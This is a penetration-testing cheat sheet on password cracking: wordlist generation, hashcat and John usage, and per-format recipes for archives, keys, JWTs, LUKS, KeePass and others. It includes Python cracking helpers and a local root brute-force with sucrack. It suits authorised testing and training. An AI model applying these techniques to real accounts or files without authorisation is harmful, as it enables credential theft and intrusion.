# Cracking / Fuzzing / Brute-force

## 00. Create Wordlists

### 00.1 Crunch

```bash
## ------------------| Usage
## Every word is exactly 8 characters: position 1 uppercase, 2-3 lowercase, 4-5 symbols, 6-8 digits.
## With -t the min and max length must both equal the pattern length.
crunch 8 8 -t ,@@^^%%%
### -t specifies a pattern, e.g. @@god@@@@, where only the @'s, ,'s, %'s and ^'s change; every other character is literal.
### @ --> lower case characters
### , --> upper case characters
### % --> numbers
### ^ --> symbols

## All words of length 1 to 6 over the character set abcdefg (starts at a, ends at gggggg)
crunch 1 6 abcdefg

## ------------------| Best Usages
crunch 4 6 0123456789ABCDEF -o crunch1.txt
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
## Read the size estimate crunch prints before it starts: 1-8 characters over a full charset is terabytes.
## For large keyspaces skip -o and pipe crunch's stdout straight into the cracker instead of writing a file.
crunch 1 8 -f /usr/share/crunch/charset.lst mixalpha-numeric-all-space -o wordlist.txt
```
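Before running a wide `crunch 1 8 ...`, work out what you are about to generate. The Python below is an added example (not the page's or crunch's code) that expands a `-t` pattern the way crunch does and sizes the output first; the symbol set for `^` is my approximation of crunch's default, the rest follows the placeholder table above.

```python
import itertools
import string

# Placeholder classes as crunch -t defines them. The "^" symbol set is an assumption that
# approximates crunch's default; pass your own `classes` to match your build exactly.
CRUNCH_CLASSES = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/ ",
}


def keyspace(pattern, classes=CRUNCH_CLASSES):
    """Number of candidates a crunch -t pattern expands to (literal characters contribute 1)."""
    n = 1
    for ch in pattern:
        n *= len(classes[ch]) if ch in classes else 1
    return n


def wordlist_bytes(pattern, classes=CRUNCH_CLASSES):
    """Size of the file crunch would write: each candidate is the pattern length plus a newline."""
    return keyspace(pattern, classes) * (len(pattern) + 1)


def fits(pattern, max_bytes, classes=CRUNCH_CLASSES):
    """The pre-flight check: refuse patterns whose output would exceed max_bytes."""
    return wordlist_bytes(pattern, classes) <= max_bytes


def expand(pattern, classes=CRUNCH_CLASSES):
    """Yield candidates in crunch's order (leftmost position varies slowest): go0, go1, ... for 'go%'."""
    slots = [classes[ch] if ch in classes else ch for ch in pattern]
    for combo in itertools.product(*slots):
        yield "".join(combo)


def write_wordlist(pattern, path, max_bytes=1 << 30, classes=CRUNCH_CLASSES):
    """Write the expansion to `path` only if it passes the size check; returns bytes written, or -1."""
    if not fits(pattern, max_bytes, classes):
        return -1
    with open(path, "w") as fh:
        for word in expand(pattern, classes):
            fh.write(word + "\n")
    return wordlist_bytes(pattern, classes)


if __name__ == "__main__":
    for pat in ("@@god@@@@", ",@@^^%%%", "%%%%"):
        print(f"{pat:12} {keyspace(pat):>15,} words {wordlist_bytes(pat) / 2**30:10.2f} GiB")
```

The size check is the point: `@@god@@@@` alone is 26^6 candidates, and a full 1-8 character charset run does not fit on a laptop disk, so generate into a pipe or narrow the pattern.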

### 00.2 CeWL

```bash
cewl --with-numbers -d 7 -m 5 -w cewl.out http(s)://IP/anything/

# -d : Depth to spider to, default 2.
# -m : Minimum word length, default 3.
# -w : Write the output to the file.
# -c : Show the count for each word found.
# -o : Let the spider visit other sites.
# --with-numbers: Accept words with numbers in as well as just letters
# --header : In format name:value - can pass multiple.
# --lowercase : Lowercase all parsed words
# --auth_user : Authentication username.
# --auth_pass : Authentication password.
# --proxy_host: Proxy host.
# --proxy_port: Proxy port, default 8080.
```

### 00.3 [UserNameGen](https://github.com/h4rithd/UserNameGen)

```bash
wget https://raw.githubusercontent.com/h4rithd/UserNameGen/master/usernamegen.py
pip install argparse textwrap3 tqdm

python usernamegen.py -o output.txt -u "Harith Dilshan" 
python usernamegen.py -o output.txt -f usernames.txt
```

### 00.4 [Username-Anarchy](https://github.com/urbanadventurer/username-anarchy.git)

```bash
## ------------------| Generate a quick username list for a single user
ruby username-anarchy h4rithd dilshan

## ------------------| List username format plugins
ruby username-anarchy --list-formats

## ------------------| Generate a username list from a file (one "first last" per line)
ruby username-anarchy --input-file names.txt --select-format first,first.last,f.last,flast > newlist.txt
```
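Username-Anarchy's format names (`first.last`, `f.last`, `flast`, ...) are easy to reproduce, and doing it yourself lets you handle what real name lists throw at you: accents, hyphens, apostrophes and people who share a first name. The Python below is an added example, not code from either tool above; the format table is my own.

```python
import re
import unicodedata

# Format names follow Username-Anarchy's naming; the mapping itself is written for this example.
FORMATS = {
    "first":      lambda f, l: f,
    "last":       lambda f, l: l,
    "first.last": lambda f, l: f"{f}.{l}",
    "first_last": lambda f, l: f"{f}_{l}",
    "firstlast":  lambda f, l: f"{f}{l}",
    "f.last":     lambda f, l: f"{f[0]}.{l}",
    "flast":      lambda f, l: f"{f[0]}{l}",
    "firstl":     lambda f, l: f"{f}{l[0]}",
    "last.first": lambda f, l: f"{l}.{f}",
    "lastf":      lambda f, l: f"{l}{f[0]}",
    "f.l":        lambda f, l: f"{f[0]}.{l[0]}",
}


def name_parts(full_name):
    """Lower-case ASCII tokens: diacritics stripped (AD and Unix logins are ASCII), apostrophes
    removed (O'Neil -> oneil), split on whitespace, dots and hyphens."""
    ascii_name = unicodedata.normalize("NFKD", full_name).encode("ascii", "ignore").decode()
    ascii_name = ascii_name.lower().replace("'", "")
    return [p for p in re.split(r"[\s.\-]+", ascii_name) if p]


def usernames(full_name, formats=None):
    """Candidate logins for one person; middle names are ignored (first and last token only)."""
    parts = name_parts(full_name)
    if not parts:
        return []
    if len(parts) == 1:            # a single-word name only yields that word
        return [parts[0]]
    first, last = parts[0], parts[-1]
    return [FORMATS[name](first, last) for name in (formats or FORMATS)]


def username_list(full_names, formats=None):
    """Candidates for many people, de-duplicated in first-seen order (two Hariths share 'harith')."""
    seen, out = set(), []
    for name in full_names:
        for user in usernames(name, formats):
            if user not in seen:
                seen.add(user)
                out.append(user)
    return out


if __name__ == "__main__":
    demo = ["Harith Dilshan", "José Núñez", "Mary-Jane O'Neil"]   # constructed input
    print("\n".join(username_list(demo, ["first.last", "f.last", "flast"])))
```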

## 01. Cracking Basic

### 01.1 Hashcat Basic

* See the [example hashes](https://hashcat.net/wiki/doku.php?id=example_hashes) page to pick the right -m mode, or ask the binary directly:

```bash
hashcat --example-hashes | grep -B1 -A2 "NTLM"
```

* Common flags

```bash
-a             Attack-mode
--force        Ignore warnings
--status       Enable automatic update of the status screen
--status-json  Enable JSON format for status output
--session      Define specific session name
--restore      Restore session from --session
--outfile      Define outfile for recovered hash

- [ Attack Modes ] -
  # | Mode
 ===+======
  0 | Straight
  1 | Combination
  3 | Brute-force
  6 | Hybrid Wordlist + Mask
  7 | Hybrid Mask + Wordlist
  
- [ Built-in charsets ] -
   # | Mask Attack
 ====+======
  ?l | abcdefghijklmnopqrstuvwxyz
  ?u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
  ?d | 0123456789
  ?h | 0123456789abcdef
  ?H | 0123456789ABCDEF
  ?s | «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
  ?a | ?l?u?d?s
  ?b | 0x00 - 0xff

```

* Cracking

```bash
## ------------------| Without rules
hashcat hashfile -m <mode> /usr/share/wordlists/rockyou.txt

## ------------------| With rules
hashcat hashfile -m <mode> /usr/share/wordlists/rockyou.txt  -r /usr/share/hashcat/rules/best64.rule  
hashcat hashfile -m <mode> /usr/share/wordlists/rockyou.txt  -r /usr/share/hashcat/rules/d3ad0ne.rule   
```

* HashCat Rules

```bash
hashcat --force passwords.list -r /usr/share/hashcat/rules/best64.rule --stdout > passwords.txt

# /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule
# /usr/share/hashcat/rules/T0XlC-insert_space_and_special_0_F.rule
# /usr/share/hashcat/rules/T0XlC-insert_top_100_passwords_1_G.rule
# /usr/share/hashcat/rules/toggles1.rule
# /usr/share/hashcat/rules/specific.rule
# /usr/share/hashcat/rules/leetspeak.rule
# /usr/share/hashcat/rules/toggles2.rule
# /usr/share/hashcat/rules/toggles3.rule
# /usr/share/hashcat/rules/InsidePro-HashManager.rule
# /usr/share/hashcat/rules/T0XlC-insert_00-99_1950-2050_toprules_0_F.rule
# /usr/share/hashcat/rules/generated.rule
# /usr/share/hashcat/rules/T0XlC.rule
# /usr/share/hashcat/rules/oscommerce.rule
# /usr/share/hashcat/rules/OneRuleToRuleThemAll.rule
# /usr/share/hashcat/rules/T0XlCv1.rule
# /usr/share/hashcat/rules/best64.rule
# /usr/share/hashcat/rules/dive.rule
# /usr/share/hashcat/rules/d3ad0ne.rule
# /usr/share/hashcat/rules/toggles5.rule
# /usr/share/hashcat/rules/combinator.rule
# /usr/share/hashcat/rules/toggles4.rule
# /usr/share/hashcat/rules/Incisive-leetspeak.rule
# /usr/share/hashcat/rules/unix-ninja-leetspeak.rule
# /usr/share/hashcat/rules/generated2.rule
# /usr/share/hashcat/rules/rockyou-30000.rule

## OneRuleToRuleThemAll
wget https://raw.githubusercontent.com/NotSoSecure/password_cracking_rules/master/OneRuleToRuleThemAll.rule  
```

* Create Rules and Variants

```bash
## ------------------| Create a file holding the base word(s) (plain echo: no -e and no backslash, or the file gets a literal backslash)
echo 'PleaseSubscribe!' >> words

## ------------------| Expand it into a new wordlist with a rule set
hashcat --stdout words -r /usr/share/hashcat/rules/best64.rule > pw-list
```
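To see what a rule file actually does to a word it helps to run the rules yourself. The following is an added example, not hashcat's code: a small interpreter for a common subset of rule functions (`:` `l` `u` `c` `C` `t` `r` `d` `f` `{` `}` `[` `]` `$X` `^X` `sXY` `@X` `TN` `DN`), producing for those rules the same candidates `hashcat --stdout -r` prints, and rejecting anything outside the subset rather than silently guessing.

```python
import string

# Position arguments in hashcat rules are 0-9 then A-Z: "T0" toggles index 0, "DA" deletes index 10.
POS = {c: i for i, c in enumerate(string.digits + string.ascii_uppercase)}


def _toggle(ch):
    return ch.lower() if ch.isupper() else ch.upper()


def apply_rule(word, rule):
    """Apply one rule line (functions separated by spaces) to a word.

    Supported: : l u c C t r d f { } [ ] $X ^X sXY @X TN DN. Any other function raises ValueError.
    """
    w, i = word, 0
    while i < len(rule):
        f = rule[i]
        i += 1
        if f == " " or f == ":":          # separator / no-op
            continue
        if f == "l":
            w = w.lower()
        elif f == "u":
            w = w.upper()
        elif f == "c":                    # capitalize first, lowercase the rest
            w = w[:1].upper() + w[1:].lower()
        elif f == "C":                    # inverse capitalize
            w = w[:1].lower() + w[1:].upper()
        elif f == "t":                    # toggle case of every character
            w = "".join(_toggle(ch) for ch in w)
        elif f == "r":
            w = w[::-1]
        elif f == "d":                    # duplicate
            w = w + w
        elif f == "f":                    # reflect
            w = w + w[::-1]
        elif f == "{":                    # rotate left
            w = w[1:] + w[:1]
        elif f == "}":                    # rotate right
            w = w[-1:] + w[:-1]
        elif f == "[":                    # delete first char
            w = w[1:]
        elif f == "]":                    # delete last char
            w = w[:-1]
        elif f == "$":                    # append X (a space after $ appends a space)
            w, i = w + rule[i], i + 1
        elif f == "^":                    # prepend X
            w, i = rule[i] + w, i + 1
        elif f == "s":                    # replace all X with Y
            w, i = w.replace(rule[i], rule[i + 1]), i + 2
        elif f == "@":                    # purge all X
            w, i = w.replace(rule[i], ""), i + 1
        elif f in "TD":                   # toggle / delete at position N
            n, i = POS[rule[i]], i + 1
            if n < len(w):
                w = w[:n] + (_toggle(w[n]) if f == "T" else "") + w[n + 1:]
        else:
            raise ValueError(f"unsupported rule function {f!r} in {rule!r}")
    return w


def load_rules(lines):
    """Rule files allow blank lines and '#' comments; everything else is a rule line."""
    return [ln.rstrip("\r\n") for ln in lines if ln.strip() and not ln.lstrip().startswith("#")]


def mutate(words, rules):
    """One candidate per (word, rule) pair, the equivalent of `hashcat --stdout words -r rules`."""
    return [apply_rule(w, r) for w in words for r in rules]


def supported(rule):
    """True if this interpreter can run the rule line; use it to spot functions outside the subset."""
    try:
        apply_rule("Sample1", rule)
        return True
    except (ValueError, IndexError, KeyError):
        return False


if __name__ == "__main__":
    demo_rules = load_rules([": ", "# leet + year", "sa@ so0 $2 $0 $2 $4", "c $!", "r", "T0 D3"])
    for cand in mutate(["password"], demo_rules):
        print(cand)
```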

Cheat Sheets

* <https://github.com/frizb/Hashcat-Cheatsheet>
* <https://hashcat.net/wiki/doku.php?id=hashcat>

### 01.2 JohnTheRipper Basic

* Cracking

```bash
john hashfile -w=/usr/share/wordlists/rockyou.txt
```

* John Mutation

```bash
## Rule sets are the [List.Rules:*] sections of john.conf; plain --rules uses the "Wordlist" section, --rules=all runs every section
sudo vi /etc/john/john.conf

john --wordlist=words.txt --rules --stdout > new_wordlist.txt
john --wordlist=words.txt --rules=all --stdout > new_wordlist.txt
```

### 01.3 SSH

```bash
## ssh2john handles both the old PEM keys (DES/AES) and the newer "OPENSSH PRIVATE KEY" format;
## the new format uses bcrypt as its KDF, so expect a far lower guess rate than with PEM keys
python3 /usr/share/john/ssh2john.py id_rsa > id_rsa.john   # on Kali, plain `ssh2john id_rsa` works too
john id_rsa.john -w=/usr/share/wordlists/rockyou.txt
```

### 01.4 ZIP

```bash
## ------------------| For Zip
sudo apt-get install fcrackzip
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip   # -u really unzips to confirm, which avoids false positives
## or with john/hashcat; zip2john's output tells you the scheme: $pkzip2$ = legacy ZipCrypto, $zip2$ = WinZip AES
zip2john file.zip > hash
john hash -w=/usr/share/wordlists/rockyou.txt
## hashcat modes for the same hashes: 17200-17230 (PKZIP/ZipCrypto variants), 13600 (WinZip AES)

## ------------------| For 7z
sudo apt-get install libcompress-raw-lzma-perl
/usr/share/john/7z2john.pl backup.7z > backup.john
john backup.john -w=/usr/share/wordlists/rockyou.txt          # hashcat: -m 11600
## or test each candidate directly with 7za (no hash extra needed, but one process per guess, so slow)
while IFS= read -r p; do
    7za t -y -p"$p" backup.7z >/dev/null 2>&1 && { echo "found: $p"; break; }
done < /usr/share/wordlists/rockyou.txt
```

* [ZipCrypto known-plaintext attack](https://youtu.be/YGoR2gSDaI4): legacy ZipCrypto (PKZIP "traditional" encryption, what zip2john reports as $pkzip2$) is broken regardless of password strength. With roughly a dozen bytes of known plaintext (a file header you can reconstruct, or a copy of one archived file) the internal keys are recovered and the whole archive is decrypted without guessing the password; bkcrack is the usual tool. WinZip AES entries are not affected.

### 01.5 PDF

```bash
## ------------------| Using pdfcrack (recovers the user password; no hash extraction needed)
apt-get install pdfcrack
pdfcrack -f encrypted.pdf -w /usr/share/wordlists/rockyou.txt

## ------------------| Using qpdf (once the password is known; also removes the owner-password restrictions)
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
## If the file opens without a password (only an owner password / restrictions set), `qpdf --decrypt` needs no password at all
```

### 01.6 JWT

```bash
## ------------------| Using hashcat (-m 16500 takes the raw token; only HMAC-signed HS* tokens have a secret to crack, RS*/ES* tokens do not)
hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt

## ------------------| Using jwtcrack
pip install PyJWT tqdm
git clone https://github.com/Sjord/jwtcrack.git && cd jwtcrack
### Crack using jwtcrack
python3 crackjwt.py <JWT_TOKEN> /usr/share/wordlists/rockyou.txt
### Convert a JWT to a format John the Ripper can understand.
python3 jwt2john.py <JWT_TOKEN> > jwt_token.txt

## ------------------| Using JohnTheRipper
john jwt_token.txt -w=/usr/share/wordlists/rockyou.txt --format=HMAC-SHA256
```
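hashcat -m 16500 and jwtcrack do the same thing underneath: recompute the HMAC over `header.payload` with each candidate secret and compare it with the token's signature. The Python below is an added example (not the page's or either tool's code) that does exactly that for HS256/HS384/HS512, refuses tokens that are not HMAC-signed (there is no secret to guess for RS*/ES*), and includes a small token issuer so it runs on constructed input.

```python
import base64
import hashlib
import hmac
import json

# Only HMAC-signed tokens have a shared secret to guess; RS*/ES*/PS* are signed with private keys.
HMAC_ALGS = {"HS256": hashlib.sha256, "HS384": hashlib.sha384, "HS512": hashlib.sha512}


def b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))   # JWTs drop the '=' padding


def b64url_encode(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def make_jwt(payload, secret, alg="HS256"):
    """Issue a token the way a typical HS* library does; used here only to construct test input."""
    header = b64url_encode(json.dumps({"alg": alg, "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{body}".encode(), HMAC_ALGS[alg]).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"


def is_hmac_signed(token):
    return json.loads(b64url_decode(token.split(".")[0])).get("alg") in HMAC_ALGS


def crack_jwt(token, candidates):
    """Return the secret that reproduces the signature, or None.

    Only the signing input (header.payload) and the raw signature are needed; a wrong
    candidate is rejected without ever looking at the payload.
    """
    header_b64, payload_b64, sig_b64 = token.split(".")
    alg = json.loads(b64url_decode(header_b64)).get("alg")
    if alg not in HMAC_ALGS:
        raise ValueError(f"alg {alg!r} is not an HMAC algorithm; there is no secret to brute-force")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    signature = b64url_decode(sig_b64)
    for secret in candidates:
        mac = hmac.new(secret.encode(), signing_input, HMAC_ALGS[alg]).digest()
        if hmac.compare_digest(mac, signature):
            return secret
    return None


def wordlist(path):
    """rockyou.txt is not clean UTF-8; latin-1 maps every byte, so no line is lost to a decode error."""
    with open(path, encoding="latin-1") as fh:
        for line in fh:
            yield line.rstrip("\r\n")


if __name__ == "__main__":
    import sys
    token, path = sys.argv[1], sys.argv[2]          # usage: crack.py <JWT> <wordlist>
    print(crack_jwt(token, wordlist(path)))
```

A hit means anyone can mint tokens with arbitrary claims; the fix on the defending side is a long random secret (or an asymmetric algorithm), and rejecting `alg` values the server did not choose.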

### 01.7 VNC

```bash
## VNC "encrypts" stored passwords with DES under a fixed, publicly known key (e84ad660c4721ae0), so this is decoding, not cracking.
## <PassWordHash> is the 16 hex characters from the registry or ~/.vnc/passwd; a zero IV on a single block makes CBC equal to ECB.
## openssl takes single-dash options; on OpenSSL 3 add `-provider legacy -provider default` if des-cbc is reported as unsupported.
echo -n <PassWordHash> | xxd -r -p | openssl enc -des-cbc -nopad -nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
```

### 01.8 WiFi

```bash
## ------------------| AirCrack-ng (the capture must contain a 4-way handshake for the target BSSID; -b selects the network when several were captured)
aircrack-ng captured.cap -w /usr/share/wordlists/rockyou.txt
## For GPU speed convert the capture with hcxpcapngtool and use hashcat -m 22000 (WPA-PBKDF2-PMKID+EAPOL)
```

### 01.9 LUKS

```bash
# ------------------| Using Hashcat (LUKS1 only: check the "Version:" line, LUKS2 headers are not supported by -m 14600)
### Get the payload offset in 512-byte sectors (the LUKS1 default is 4096)
cryptsetup luksDump backup.img | grep -E 'Version|Payload'
### Dump header + key-slot material + the first payload sector: count = payload offset + 1
dd if=backup.img of=hash bs=512 count=4097
### Cracking
hashcat -m 14600 hash /usr/share/wordlists/rockyou.txt

# ------------------| Using JohnTheRipper
luks2john.py /dev/sdb1 > sdb1.john
john sdb1.john -w=/usr/share/wordlists/rockyou.txt

# ------------------| How to mount/unmount
### Mount (luksOpen prompts for the passphrase)
sudo cryptsetup luksOpen backup.img backup
sudo mount /dev/mapper/backup /mnt/
### Unmount
sudo umount -l /mnt/
sudo cryptsetup luksClose backup
```
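The `count=4097` above assumes the default LUKS1 payload offset of 4096 sectors; the value to use is always the payload offset plus one. The Python below is an added example, not code from cryptsetup, hashcat or john: it parses a LUKS1 header, derives the `dd` count, flags LUKS2 headers (which -m 14600 and luks2john do not handle) and checks the cipher/mode/hash against the algorithms I know hashcat's LUKS module to support (confirm with `hashcat --example-hashes -m 14600` on your build). The header builder exists only to give the parser test input.

```python
import struct

LUKS_MAGIC = b"LUKS\xba\xbe"
# LUKS1 on-disk layout (big-endian): a 208-byte phdr followed by 8 x 48-byte key slots = 592 bytes.
PHDR = struct.Struct(">6sH32s32s32sII20s32sI40s")
SLOT = struct.Struct(">II32sII")
KEY_ENABLED, KEY_DISABLED = 0x00AC71F3, 0x0000DEAD
# Algorithms hashcat's -m 14600 module handles, as documented for hashcat; verify on your build.
HASHCAT_CIPHERS = {"aes", "serpent", "twofish"}
HASHCAT_HASHES = {"sha1", "sha256", "sha512", "ripemd160", "whirlpool"}
HASHCAT_MODES = {"cbc-essiv:sha256", "cbc-plain", "cbc-plain64", "xts-plain", "xts-plain64"}


def _cstr(raw):
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")


def luks_version(data):
    """Quick triage: 1 means the hashcat/john workflow applies, 2 needs other tooling, None is not LUKS."""
    if len(data) < 8 or data[:6] != LUKS_MAGIC:
        return None
    return struct.unpack_from(">H", data, 6)[0]


def parse_luks1_header(data):
    """Parse the first 592 bytes of a LUKS1 volume; raises ValueError for anything that is not LUKS1."""
    need = PHDR.size + 8 * SLOT.size
    if len(data) < need:
        raise ValueError(f"need at least {need} bytes, got {len(data)}")
    (magic, version, cipher, mode, hash_spec, payload_offset, key_bytes,
     _mk_digest, _mk_salt, mk_iterations, uuid) = PHDR.unpack_from(data, 0)
    if magic != LUKS_MAGIC:
        raise ValueError("no LUKS magic at offset 0 (not LUKS, or the wrong partition was dumped)")
    if version != 1:
        raise ValueError(f"LUKS{version} header: hashcat -m 14600 and luks2john only handle LUKS1")
    slots = []
    for idx in range(8):
        active, iterations, _salt, km_offset, stripes = SLOT.unpack_from(data, PHDR.size + idx * SLOT.size)
        slots.append({"slot": idx, "active": active == KEY_ENABLED, "iterations": iterations,
                      "key_material_offset": km_offset, "stripes": stripes})
    return {"version": version, "cipher": _cstr(cipher), "mode": _cstr(mode), "hash": _cstr(hash_spec),
            "payload_offset": payload_offset, "key_bytes": key_bytes, "mk_iterations": mk_iterations,
            "uuid": _cstr(uuid), "slots": slots}


def dd_count(hdr):
    """Sectors to dump for hashcat: header + key-slot material + the first payload sector."""
    return hdr["payload_offset"] + 1


def hashcat_compatible(hdr):
    return (hdr["cipher"] in HASHCAT_CIPHERS and hdr["hash"] in HASHCAT_HASHES
            and hdr["mode"] in HASHCAT_MODES and any(s["active"] for s in hdr["slots"]))


def build_test_header(version=1, cipher="aes", mode="xts-plain64", hash_spec="sha256",
                      payload_offset=4096, active_slots=(0,), iterations=100000):
    """Synthetic header for exercising the parser: digests, salts and key material are zero, so it is not a real volume."""
    phdr = PHDR.pack(LUKS_MAGIC, version, cipher.encode(), mode.encode(), hash_spec.encode(),
                     payload_offset, 64, b"\0" * 20, b"\0" * 32, iterations,
                     b"00000000-0000-0000-0000-000000000000")
    slots = b"".join(
        SLOT.pack(KEY_ENABLED if i in active_slots else KEY_DISABLED,
                  iterations if i in active_slots else 0, b"\0" * 32, 8 + i * 504, 4000)
        for i in range(8))
    return phdr + slots


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as fh:                      # usage: luksinfo.py <image or device>
        hdr = parse_luks1_header(fh.read(PHDR.size + 8 * SLOT.size))
    print(f"{hdr['cipher']}-{hdr['mode']} / {hdr['hash']}, payload offset {hdr['payload_offset']}")
    print(f"dd if={sys.argv[1]} of=hash bs=512 count={dd_count(hdr)}   # hashcat -m 14600 ok: {hashcat_compatible(hdr)}")
```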

### 01.10 su (sucrack)

```bash
# ------------------| sucrack brute-forces su(1) locally with many threads; it needs no root, but PAM logs every failed attempt (auth.log "FAILED SU"), so it is loud
git clone https://github.com/hemp3l/sucrack.git
cd sucrack
autoreconf -f -i
./configure
make
# make install   # optional: the binary is usable from src/ without it
ls -al src/sucrack

## ------------------| Cracking process
### -a ANSI status display, -w 20 worker threads, -s 10 print statistics every 10 s, -u target user, wordlist last
./src/sucrack -a -w 20 -s 10 -u root dict.txt
### -r turns on the built-in rewriter, which also tries mutated variants of each word
./src/sucrack -a -w 20 -s 10 -u root -r dict.txt
```

### 01.11 Microsoft Office

```bash
## ------------------| Hashcat
wget https://raw.githubusercontent.com/stricture/hashstack-server-plugin-oclhashcat/master/scrapers/office2hashcat.py
### works on the legacy binary formats (.doc/.dot/.docm/.xls/.xlm/.ppt) as well as OOXML (.docx/.xlsx/.pptx)
python2 office2hashcat.py file.xls > hash.txt
### hashcat 6.x auto-detects the mode; otherwise -m 9400/9500/9600 (Office 2007/2010/2013) or 9700-9820 ($oldoffice$, Office 97-2003)
hashcat hash.txt /usr/share/wordlists/rockyou.txt

## ------------------| JohnTheRipper
wget https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/office2john.py
python3 office2john.py file.xls > john-hash.txt
john john-hash.txt -w=/usr/share/wordlists/rockyou.txt
```

### 01.12 Group Policy Preferences

```bash
## cpassword values in SYSVOL (Groups.xml, ScheduledTasks.xml, ...) are AES-encrypted with a key Microsoft published in its documentation, so any cpassword decrypts instantly
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
```

### 01.13 PFX certificate

```bash
/usr/share/john/pfx2john.py file.pfx > file.pfx.john
john file.pfx.john -w=/usr/share/wordlists/rockyou.txt 
```

### 01.14 KeePass

```bash
## ------------------| JohnTheRipper
keepass2john Database.kdbx > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

## ------------------| Hashcat (13400 covers KeePass 1.x and 2.x with the AES-KDF; KDBX 4 databases using Argon2 are not supported by this mode, use john)
keepass2john Database.kdbx | awk -F: '{print $2}' > hash.txt
hashcat -m 13400 hash.txt /usr/share/wordlists/rockyou.txt

## ------------------| View the passwords
kpcli --kdb Database.kdbx
find .
show /file/path/key -f
```

### 01.15 Ansible

```bash
## ------------------| JohnTheRipper (ansible2john ships with john; the script is also at https://fossies.org/linux/john/run/ansible2john.py)
ansible2john file > hash
john hash -w=/usr/share/wordlists/rockyou.txt

## ------------------| hashcat (-m 16900 Ansible Vault; --user because each line starts with the file name)
ansible2john file > hash
hashcat -m 16900 hash /usr/share/wordlists/rockyou.txt --user

## ------------------| Decrypt with the recovered password (prompts for it)
ansible-vault view file
```

### 01.16 Gitea

```bash
wget https://gist.githubusercontent.com/h4rithd/0c5da36a0274904cafb84871cf14e271/raw/f109d178edbe756f15060244d735181278c9b57e/gitea2hashcat.py
python3 gitea2hashcat.py gitea.db > hashes.txt
## Gitea's default PASSWORD_HASH_ALGO is pbkdf2 (PBKDF2-HMAC-SHA256, hashcat -m 10900); hashcat 6.x auto-detects the converted lines
hashcat hashes.txt /usr/share/wordlists/rockyou.txt
```

### 01.17 PBKDF2

```bash
## ------------------| PBKDF2:SHA256
wget https://gist.githubusercontent.com/h4rithd/184a49164d6528069437db7d8623b1f8/raw/d7eb4e5c2af7deefee2da5835f2aa44d06be996a/pbkdf2_sha256_hash_cracker.py
python3 pbkdf2_sha256_hash_cracker.py -f hashes.txt -w /usr/share/wordlists/rockyou.txt
```
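The gist above is one PBKDF2-SHA256 cracker; the mechanics are short enough to write yourself, and the more useful step is converting an application's stored string into what hashcat's PBKDF2 modes take (-m 10900 for SHA-256, 12000 for SHA-1, 12100 for SHA-512), because a GPU will outrun any Python loop on a high iteration count. The following is an added example, not the gist's code: it parses the Werkzeug/Flask and Django encodings, verifies and cracks, and emits the hashcat line. The two hash builders construct test input with a fixed salt and a low iteration count, which no real application should use.

```python
import base64
import hashlib
import hmac

# hashcat's generic PBKDF2 modes; their line format is "<hash>:<iterations>:<b64 salt>:<b64 digest>"
HASHCAT_MODES = {"sha1": 12000, "sha256": 10900, "sha512": 12100}


def parse_pbkdf2(stored):
    """Return (hash_name, iterations, salt_bytes, digest_bytes) for the two common encodings below."""
    if stored.startswith("pbkdf2:"):        # Werkzeug/Flask: pbkdf2:sha256:260000$<salt>$<hex digest>
        method, salt, digest_hex = stored.split("$", 2)
        _, algo, iterations = method.split(":")
        return algo, int(iterations), salt.encode(), bytes.fromhex(digest_hex)
    if stored.startswith("pbkdf2_"):        # Django: pbkdf2_sha256$260000$<salt>$<base64 digest>
        method, iterations, salt, digest_b64 = stored.split("$", 3)
        return method[len("pbkdf2_"):], int(iterations), salt.encode(), base64.b64decode(digest_b64)
    raise ValueError("unrecognised PBKDF2 string")


def verify(stored, password):
    algo, iterations, salt, digest = parse_pbkdf2(stored)
    candidate = hashlib.pbkdf2_hmac(algo, password.encode(), salt, iterations, len(digest))
    return hmac.compare_digest(candidate, digest)


def crack(stored, candidates):
    """Parse once, derive per candidate; the iteration count is what makes every guess expensive."""
    algo, iterations, salt, digest = parse_pbkdf2(stored)
    for password in candidates:
        derived = hashlib.pbkdf2_hmac(algo, password.encode(), salt, iterations, len(digest))
        if hmac.compare_digest(derived, digest):
            return password
    return None


def to_hashcat(stored):
    """Rewrite the stored string into the (mode, line) pair hashcat wants, e.g. -m 10900 for sha256."""
    algo, iterations, salt, digest = parse_pbkdf2(stored)
    if algo not in HASHCAT_MODES:
        raise ValueError(f"no generic hashcat mode for PBKDF2-HMAC-{algo}")
    b64 = lambda b: base64.b64encode(b).decode()
    return HASHCAT_MODES[algo], f"{algo}:{iterations}:{b64(salt)}:{b64(digest)}"


def werkzeug_hash(password, salt="r4nd0msalt", iterations=1000, algo="sha256"):
    """Werkzeug-style string for the example; real deployments use a random salt and far more iterations."""
    digest = hashlib.pbkdf2_hmac(algo, password.encode(), salt.encode(), iterations)
    return f"pbkdf2:{algo}:{iterations}${salt}${digest.hex()}"


def django_hash(password, salt="r4nd0msalt", iterations=1000, algo="sha256"):
    """Django-style string for the example (same KDF, base64 digest instead of hex)."""
    digest = hashlib.pbkdf2_hmac(algo, password.encode(), salt.encode(), iterations)
    return f"pbkdf2_{algo}${iterations}${salt}${base64.b64encode(digest).decode()}"


if __name__ == "__main__":
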